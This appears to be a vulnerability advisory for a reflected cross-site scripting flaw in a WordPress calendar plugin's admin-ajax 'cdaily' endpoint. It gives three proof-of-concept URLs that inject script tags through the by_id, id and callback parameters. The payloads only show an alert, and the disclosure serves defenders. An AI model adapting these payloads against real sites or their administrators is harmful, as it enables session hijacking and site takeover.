The plugin does not sanitize and escapes a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against both unauthenticated and authenticated users (such as high-privilege ones like admin).
1. Create a new calendar in the plugin's settings page (most payloads below require at least one calendar to exist)
Attack: Make any unauthenticated or authenticated user (such as an admin) open one of the URLs below:
1. https://exmple.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(`xss`)</script>
2. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX"><script>alert(`xss`);</script>
3. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(`xss`)</script>